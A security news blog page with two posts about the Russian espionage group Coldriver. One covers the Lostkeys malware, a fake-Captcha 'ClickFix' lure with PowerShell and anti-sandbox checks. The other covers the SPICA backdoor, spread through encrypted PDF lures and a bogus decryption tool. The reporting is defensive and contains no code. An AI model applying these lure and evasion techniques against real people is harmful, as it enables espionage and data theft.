Search This Blog
Powered by Blogger.

Blog Archive

Labels

About Me

Load More
Trendy Right Now

Popular Posts

Showing posts with label COLDRIVER. Show all posts
Russian Hackers
COLDRIVER Coldriver hacker group Cyber Attacks cyber espionage data security espionage Hacker attack Malware Attack Malwares Russian Hackers

Lostkeys Malware: Russian Group Coldriver Targets Western Officials in Espionage Campaign

 

A new wave of cyber espionage has emerged, with Russian hackers deploying a sophisticated malware strain known as “Lostkeys” to infiltrate the systems of Western officials, journalists, and NGOs. According to researchers from Google’s Threat Intelligence Group, the malware is linked to Coldriver, also known as UNC4057, Star Blizzard, or Callisto—a threat actor believed to be part of Russia’s Federal Security Service (FSB), the successor to the KGB. 

Coldriver has traditionally been involved in phishing operations to steal credentials, but the emergence of Lostkeys demonstrates a significant leap in their cyber capabilities. Lostkeys appears to mark a shift in strategy for the group, moving beyond phishing and into deeper system infiltration. The malware is deployed in a targeted manner, reserved for high-value individuals such as political advisors, think tank members, journalists, and people with known connections to Ukraine.

Activity related to Lostkeys was observed by Google in the early months of 2024—specifically January, March, and April—with evidence suggesting its use might have started as far back as December 2023. The attack begins with a deceptive Captcha page, tricking victims into copying a malicious PowerShell script into the Windows Run dialog. This method, known as “ClickFix,” bypasses typical security filters and exploits user behavior rather than software vulnerabilities. 

Once executed, the script connects to a command-and-control server, downloading a series of payloads uniquely tailored to each victim. In an effort to avoid detection, the malware includes anti-sandbox measures. During the second stage of infection, the script checks the screen resolution of the host machine and halts if it matches known virtual machine environments used by analysts and cybersecurity researchers. If the device passes this check, the malware proceeds to the final stage—a Visual Basic Script that steals data, including specific file types, system details, and active processes. These are exfiltrated back to the attackers using an encoded system that applies a unique two-key substitution cipher for each infected machine. 

Lostkeys appears to be a more refined successor to a previous malware strain known as Spica, which Coldriver also deployed in 2024. While both strains focus on data exfiltration, Lostkeys features a more intricate delivery system and improved obfuscation techniques. Some earlier samples of Lostkeys mimicked legitimate software like Maltego and used executable files instead of PowerShell, though Google has not confirmed if these instances were part of the same campaign or the work of a different threat actor reusing Coldriver’s tactics. 

This development highlights an alarming evolution in state-backed cyber operations, where advanced social engineering and stealth techniques are being increasingly used to infiltrate high-profile targets. As geopolitical tensions persist, the risks posed by such targeted cyber espionage campaigns are expected to grow.
Read more »
SPICA
APT actors COLDRIVER ColdRiver APT Custom backdoor Cyber Attacks Google TAG Russian threat actors SPICA

ColdRiver APT: Google TAG Warns Against Russian APT Group is Using a Custom Backdoor


Google has warned that a Russia-linked threat actor named ‘COLDRIVER’ which is expanding its targets has also been developing custom malware. 

ColdRiver APT

The ColdRiver APT (aka “Seaborgium“, “Callisto”, “Star Blizzard”, “TA446”) is a Russian cyberespionage outfit that has been targeting government officials, military personnel, journalists and think tanks since at least 2015.

The threat actor has previously engaged in ongoing phishing and credential theft efforts that resulted in intrusions and data theft. Although specialists have noticed efforts targeting the Baltics, Nordics, and Eastern Europe regions, including Ukraine, the APT predominantly targets NATO member states.

Google TAG researchers have warned against COLDRIVER, claiming that it is enhancing its tactics techniques and procedures (TTPs), in order to evade detection. 

TAG has recently seen COLDRIVER use phishing efforts to spread bespoke malware using PDFs as lure materials. Google experts discovered and stopped these attempts by adding all known domains and hashes to Safe Browsing blocklists.

In November 2022, TAG observed that COLDRIVER was sending its targets malicious PDF documents from their fraudulent accounts. Threat actors asked for the recipient's feedback on fresh opinion pieces or other kinds of publications that they were hoping to publish using the lure materials. The victims see an encrypted text when they view the PDF.

In case the targets fail to read the content, following which they contact the threat actors, they receive a link from the cyberspies to a decryption tool located on the threat actors' website. After downloading and running the tool, a backdoor—tracking as SPICA—is installed and a bogus document appears. 

“Once executed, SPICA decodes an embedded PDF, writes it to disk, and opens it as a decoy for the user. In the background, it establishes persistence and starts the main C2 loop, waiting for commands to execute,” reads TAG’s analysis. 

Spica is a Rust backdoor that uses JSON over websockets for C2. Spica supports multiple capabilities, such as: 

  • Executing arbitrary shell commands. 
  • Stealing cookies from Chrome, Firefox, Opera and Edge. 
  • Uploading and downloading files. 
  • Perusing the filesystem by listing the contents of it. 
  • Enumerating documents and exfiltrating them in an archive 
  • There is also a command called “telegram,” however the functionality of this command is unclear.

An obfuscated PowerShell command that generates a scheduled activity called CalendarChecker is how the infection stays persistent.

The Russian APT has reportedly been using SPICA since at least November 2022, while the researchers have only observed its use since early September 2023.

Read more »
Subscribe to: Posts (Atom)